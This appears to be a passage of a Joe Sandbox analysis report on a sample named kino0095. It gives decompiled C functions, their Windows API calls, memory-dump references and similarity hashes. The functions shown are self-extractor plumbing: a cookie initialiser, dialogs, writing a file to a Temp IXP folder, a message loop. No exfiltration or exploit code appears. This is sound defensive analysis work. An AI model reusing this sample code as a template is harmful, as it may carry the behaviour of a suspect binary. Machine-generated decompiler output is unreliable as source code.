                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E010B7155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x10b8004; // 0x72151d89
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x10b8004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x10b8004 = _t39;
				}
				_t37 =  !_t36;
				 *0x10b8008 = _t37;
				return _t37;
			}











                                                                                                                                                                                                                                    0x010b715d
                                                                                                                                                                                                                                    0x010b7161
                                                                                                                                                                                                                                    0x010b7165
                                                                                                                                                                                                                                    0x010b7178
                                                                                                                                                                                                                                    0x010b7182
                                                                                                                                                                                                                                    0x010b718e
                                                                                                                                                                                                                                    0x010b7197
                                                                                                                                                                                                                                    0x010b71a0
                                                                                                                                                                                                                                    0x010b71b1
                                                                                                                                                                                                                                    0x010b71b8
                                                                                                                                                                                                                                    0x010b71c4
                                                                                                                                                                                                                                    0x010b71c7
                                                                                                                                                                                                                                    0x010b71cb
                                                                                                                                                                                                                                    0x010b71d5
                                                                                                                                                                                                                                    0x010b71da
                                                                                                                                                                                                                                    0x010b71da
                                                                                                                                                                                                                                    0x010b71dc
                                                                                                                                                                                                                                    0x010b71dc
                                                                                                                                                                                                                                    0x010b71e2
                                                                                                                                                                                                                                    0x010b71e5
                                                                                                                                                                                                                                    0x010b71ee

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 010B7182
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 010B7191
                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 010B719A
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 010B71A3
                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 010B71B8
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1445889803-0
                                                                                                                                                                                                                                    • Opcode ID: 589be69769917a7c28eca80547c6cec5288400357540cd074c20fdace3118528
                                                                                                                                                                                                                                    • Instruction ID: ed3e8486e1fedb05290a151bb5135dd227049324048519ff42f2043a2603e6bc
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 589be69769917a7c28eca80547c6cec5288400357540cd074c20fdace3118528
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45111F71E11208DFCB60DFBCD6886DEB7F9EF48355F5148A6E845E7244D6359A008B50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B19E0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                    			E010B19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0x10b8004; // 0x72151d89
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E010B43D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0x10b9a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E010B6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}













                                                                                                                                                                                                                                    0x010b19e0
                                                                                                                                                                                                                                    0x010b19e0
                                                                                                                                                                                                                                    0x010b19eb
                                                                                                                                                                                                                                    0x010b19f2
                                                                                                                                                                                                                                    0x010b19f9
                                                                                                                                                                                                                                    0x010b19fc
                                                                                                                                                                                                                                    0x010b1a01
                                                                                                                                                                                                                                    0x010b1a2a
                                                                                                                                                                                                                                    0x010b1a2e
                                                                                                                                                                                                                                    0x010b1a3e
                                                                                                                                                                                                                                    0x010b1a4f
                                                                                                                                                                                                                                    0x010b1a62
                                                                                                                                                                                                                                    0x010b1a6a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b1a03
                                                                                                                                                                                                                                    0x010b1a06
                                                                                                                                                                                                                                    0x010b1a20
                                                                                                                                                                                                                                    0x010b1a20
                                                                                                                                                                                                                                    0x010b1a08
                                                                                                                                                                                                                                    0x010b1a08
                                                                                                                                                                                                                                    0x010b1a14
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b1a16
                                                                                                                                                                                                                                    0x010b1a18
                                                                                                                                                                                                                                    0x010b1a70
                                                                                                                                                                                                                                    0x010b1a72
                                                                                                                                                                                                                                    0x010b1a72
                                                                                                                                                                                                                                    0x010b1a14
                                                                                                                                                                                                                                    0x010b1a06
                                                                                                                                                                                                                                    0x010b1a81

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 010B1A18
                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 010B1A24
                                                                                                                                                                                                                                    • LoadStringA.USER32(?,?,00000200), ref: 010B1A4F
                                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 010B1A62
                                                                                                                                                                                                                                    • MessageBeep.USER32(000000FF), ref: 010B1A6A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1273765764-0
                                                                                                                                                                                                                                    • Opcode ID: 44fdf9e0eb9450e442632142bb746d71589cf68559f17add040846008ba109b8
                                                                                                                                                                                                                                    • Instruction ID: de0802f9aee1a199df22c2cdda5d9db77db33c06e78f27b1673c9d3bac4ece28
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44fdf9e0eb9450e442632142bb746d71589cf68559f17add040846008ba109b8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4611C831600109EFDB60EF68ED88AEE77F8EF49350F008565F992D7184DA35AE01CB95
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B63C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                                                                                    			E010B63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0x10b8004; // 0x72151d89
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E010B1781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
				E010B658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0x10b9124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0x10b9124 = 0x80070052;
					_t37 = 0;
				}
				return E010B6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}















                                                                                                                                                                                                                                    0x010b63cb
                                                                                                                                                                                                                                    0x010b63d2
                                                                                                                                                                                                                                    0x010b63d8
                                                                                                                                                                                                                                    0x010b63ea
                                                                                                                                                                                                                                    0x010b63f3
                                                                                                                                                                                                                                    0x010b6401
                                                                                                                                                                                                                                    0x010b6402
                                                                                                                                                                                                                                    0x010b6410
                                                                                                                                                                                                                                    0x010b6415
                                                                                                                                                                                                                                    0x010b6433
                                                                                                                                                                                                                                    0x010b6438
                                                                                                                                                                                                                                    0x010b6449
                                                                                                                                                                                                                                    0x010b6463
                                                                                                                                                                                                                                    0x010b646d
                                                                                                                                                                                                                                    0x010b6477
                                                                                                                                                                                                                                    0x010b6477
                                                                                                                                                                                                                                    0x010b647a
                                                                                                                                                                                                                                    0x010b643a
                                                                                                                                                                                                                                    0x010b643a
                                                                                                                                                                                                                                    0x010b6444
                                                                                                                                                                                                                                    0x010b6444
                                                                                                                                                                                                                                    0x010b6492

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 010B642D
                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 010B645B
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 010B647A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 010B63EB
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                    • API String ID: 1065093856-1116576409
                                                                                                                                                                                                                                    • Opcode ID: 7cd220991c1a8703a89548c550cfe95bd386dfdd18da1afd8d188bfb22fdc6d5
                                                                                                                                                                                                                                    • Instruction ID: 8a7e6b6c69787f3143b46d5527f2c23a99351c4b1b5d59997abb5e8cc4682d37
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cd220991c1a8703a89548c550cfe95bd386dfdd18da1afd8d188bfb22fdc6d5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4421C3B1A0021CABD760DF25DCC4FEA77A8EB45314F0045A9A6C5A3240DBB95D848F64
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B6517 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                                                                                    			E010B6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0x10b9a3c; // 0x10b0000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E010B44B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t24 = _a16;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}







                                                                                                                                                                                                                                    0x010b651f
                                                                                                                                                                                                                                    0x010b652a
                                                                                                                                                                                                                                    0x010b6534
                                                                                                                                                                                                                                    0x010b656b
                                                                                                                                                                                                                                    0x010b6577
                                                                                                                                                                                                                                    0x010b657c
                                                                                                                                                                                                                                    0x010b6536
                                                                                                                                                                                                                                    0x010b653e
                                                                                                                                                                                                                                    0x010b6542
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b6544
                                                                                                                                                                                                                                    0x010b6547
                                                                                                                                                                                                                                    0x010b654c
                                                                                                                                                                                                                                    0x010b6549
                                                                                                                                                                                                                                    0x010b6549
                                                                                                                                                                                                                                    0x010b6549
                                                                                                                                                                                                                                    0x010b655e
                                                                                                                                                                                                                                    0x010b6560
                                                                                                                                                                                                                                    0x010b6569
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b6569
                                                                                                                                                                                                                                    0x010b6542
                                                                                                                                                                                                                                    0x010b6587

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindResourceA.KERNEL32(010B0000,000007D6,00000005), ref: 010B652A
                                                                                                                                                                                                                                    • LoadResource.KERNEL32(010B0000,00000000,?,?,010B2EE8,00000000,010B19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010B6538
                                                                                                                                                                                                                                    • DialogBoxIndirectParamA.USER32(010B0000,00000000,00000547,010B19E0,00000000), ref: 010B6557
                                                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,010B2EE8,00000000,010B19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010B6560
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1214682469-0
                                                                                                                                                                                                                                    • Opcode ID: 81bca4991eb737fd5c3540675561d78b4f05cc245eb74033adeaa2325870e888
                                                                                                                                                                                                                                    • Instruction ID: 34c6c265af744e4056d8634f34d221aca8f14bbcc084721db0a5f1f3ebd392fd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81bca4991eb737fd5c3540675561d78b4f05cc245eb74033adeaa2325870e888
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE012672200205BBDB205EA99CC8DFB7AACEB85360F000165FE8493148DB77CD208BA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B3680 Relevance: 6.1, APIs: 4, Instructions: 51windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E010B3680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}







                                                                                                                                                                                                                                    0x010b368c
                                                                                                                                                                                                                                    0x010b368f
                                                                                                                                                                                                                                    0x010b3691
                                                                                                                                                                                                                                    0x010b369f
                                                                                                                                                                                                                                    0x010b36a7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b36ba
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b36bc
                                                                                                                                                                                                                                    0x010b36bc
                                                                                                                                                                                                                                    0x010b36c0
                                                                                                                                                                                                                                    0x010b36cb
                                                                                                                                                                                                                                    0x010b36c2
                                                                                                                                                                                                                                    0x010b36c4
                                                                                                                                                                                                                                    0x010b36c4
                                                                                                                                                                                                                                    0x010b36da
                                                                                                                                                                                                                                    0x010b36e0
                                                                                                                                                                                                                                    0x010b36e6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b36e6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b36ba
                                                                                                                                                                                                                                    0x010b36ed

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 010B369F
                                                                                                                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010B36B2
                                                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 010B36CB
                                                                                                                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010B36DA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2776232527-0
                                                                                                                                                                                                                                    • Opcode ID: 6cef93d102463e37576b3419420292c68232da0dcc9d3a8360899e193006f509
                                                                                                                                                                                                                                    • Instruction ID: 33117b20f2be4fc36fc5d05a1e7a860421110f1e326b4e416e25e47ca371bdc5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cef93d102463e37576b3419420292c68232da0dcc9d3a8360899e193006f509
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2018472A00214BBDB704AAA5C88EEB7ABCFB89B10F104269FA45E6184D5658540C760
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B65E8 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                                                                                    			E010B65E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}









                                                                                                                                                                                                                                    0x010b65e8
                                                                                                                                                                                                                                    0x010b65ed
                                                                                                                                                                                                                                    0x010b65ef
                                                                                                                                                                                                                                    0x010b65f2
                                                                                                                                                                                                                                    0x010b65f4
                                                                                                                                                                                                                                    0x010b65f4
                                                                                                                                                                                                                                    0x010b65f6
                                                                                                                                                                                                                                    0x010b65f7
                                                                                                                                                                                                                                    0x010b6608
                                                                                                                                                                                                                                    0x010b6611
                                                                                                                                                                                                                                    0x010b6618
                                                                                                                                                                                                                                    0x010b661c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b660e
                                                                                                                                                                                                                                    0x010b6623
                                                                                                                                                                                                                                    0x010b6625
                                                                                                                                                                                                                                    0x010b663b
                                                                                                                                                                                                                                    0x010b663b
                                                                                                                                                                                                                                    0x010b663d
                                                                                                                                                                                                                                    0x010b6641
                                                                                                                                                                                                                                    0x010b6610
                                                                                                                                                                                                                                    0x010b6610
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b6610
                                                                                                                                                                                                                                    0x010b6644
                                                                                                                                                                                                                                    0x010b6647
                                                                                                                                                                                                                                    0x010b6647
                                                                                                                                                                                                                                    0x010b6621
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,010B2B33), ref: 010B6602
                                                                                                                                                                                                                                    • CharPrevA.USER32(?,00000000), ref: 010B6612
                                                                                                                                                                                                                                    • CharPrevA.USER32(?,00000000), ref: 010B6629
                                                                                                                                                                                                                                    • CharNextA.USER32(00000000), ref: 010B6635
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Char$Prev$Next
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3260447230-0
                                                                                                                                                                                                                                    • Opcode ID: 49427434bf2d7fc8e8040f287972f71b06ffbd5ea88ff9efd6da4ae7c4744812
                                                                                                                                                                                                                                    • Instruction ID: c8a74180bbb3d891c0e441d57b9071e651517cc504aa42f79eeea453108685ec
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49427434bf2d7fc8e8040f287972f71b06ffbd5ea88ff9efd6da4ae7c4744812
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17F02832105150AEE7730A2C8CC89FBBFDCDF8F19471905EFE8D193101D61B09068B61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B69B0 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E010B69B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0x10b81f8 = E010B6C70();
				__set_app_type(E010B6FBE(2));
				 *0x10b88a4 =  *0x10b88a4 | 0xffffffff;
				 *0x10b88a8 =  *0x10b88a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0x10b8528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0x10b851c; // 0x0
				 *_t5 = _t12;
				_t6 = E010B7000();
				if( *0x10b8000 == 0) {
					__setusermatherr(E010B7000);
				}
				E010B71EF(_t6);
				return 0;
			}








                                                                                                                                                                                                                                    0x010b69b7
                                                                                                                                                                                                                                    0x010b69c2
                                                                                                                                                                                                                                    0x010b69c8
                                                                                                                                                                                                                                    0x010b69cf
                                                                                                                                                                                                                                    0x010b69d8
                                                                                                                                                                                                                                    0x010b69de
                                                                                                                                                                                                                                    0x010b69e4
                                                                                                                                                                                                                                    0x010b69e6
                                                                                                                                                                                                                                    0x010b69ec
                                                                                                                                                                                                                                    0x010b69f2
                                                                                                                                                                                                                                    0x010b69f4
                                                                                                                                                                                                                                    0x010b6a00
                                                                                                                                                                                                                                    0x010b6a07
                                                                                                                                                                                                                                    0x010b6a0d
                                                                                                                                                                                                                                    0x010b6a0e
                                                                                                                                                                                                                                    0x010b6a15

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 010B6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 010B6FC5
                                                                                                                                                                                                                                    • __set_app_type.MSVCRT ref: 010B69C2
                                                                                                                                                                                                                                    • __p__fmode.MSVCRT ref: 010B69D8
                                                                                                                                                                                                                                    • __p__commode.MSVCRT ref: 010B69E6
                                                                                                                                                                                                                                    • __setusermatherr.MSVCRT ref: 010B6A07
                                                                                                                                                                                                                                    Memory Dump Source
